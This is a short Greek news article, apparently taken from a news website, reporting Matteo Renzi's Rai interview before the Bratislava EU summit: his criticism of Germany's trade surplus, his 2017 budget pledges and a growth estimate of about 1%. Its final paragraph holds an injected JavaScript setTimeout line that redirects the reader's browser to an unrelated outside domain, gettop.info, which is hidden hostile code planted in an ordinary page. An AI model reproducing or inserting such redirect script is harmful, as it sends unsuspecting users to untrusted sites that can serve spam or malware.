Ρέντσι: Θα φέρω τη φωνή μιας χώρας που κουράστηκε να λαμβάνει κατάλογο με υποχρεώσεις

0
8

 

Την κούραση της Ιταλίας μετέφερε ο Ιταλός πρωθυπουργός σε συνέντευξή του στη Rai τονίζοντας πως στην Ευρπωαϊκή Σύνοδο της μπρατισλάβα «θα φέρω τη φωνή μιας χώρας η οποία κουράστηκε να λαμβάνει κατάλογο με υποχρεώσεις στις οποίες πρέπει να ανταποκριθεί».

«Η Ιταλία σέβεται τους ευρωπαϊκούς κανόνες» τόνισε ο Ιταλός πρωθυπουργός.

Σε μια έμμεση όσο και σαφή αναφορά στη Γερμανία υπογράμμισε: «Άλλες χώρες δεν τους σέβονται. Διότι πρέπει να θυμόμαστε ότι υπάρχει ο κανόνας σχετικός με το έλλειμμα, αλλά και εκείνος για το εμπορικό πλεόνασμα, τον οποίο η Γερμανία δεν σέβεται».

Σε ό,τι αφορά τον ιταλικό κρατικό προϋπολογισμό για το 2017, ο Ρέντσι δήλωσε ότι δεν πρόκειται να υπάρξουν περικοπές στον τομέα της υγείας, και ότι δεν θα αυξηθούν ούτε οι φόροι στα τσιγάρα, διαψεύδοντας σχετικά δημοσιεύματα του Τύπου.

Σχετικά με την αύξηση του ΑΕΠ της χώρας, ο πρωθυπουργός απάντησε ότι «φέτος, συνολικά, μπορεί να υπολογισθεί γύρω στο 1%. Είναι μια κατάσταση η οποία έχει κάπως βελτιωθεί, αλλά όχι όσο θα έπρεπε».

«Είναι σαν να βλέπουμε ένα αυτοκίνητο το οποίο προχωρούσε προς λάθος κατεύθυνση, να έχει αλλάξει πορεία και να έχει αρχίσει να ακολουθεί τον σωστό δρόμο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here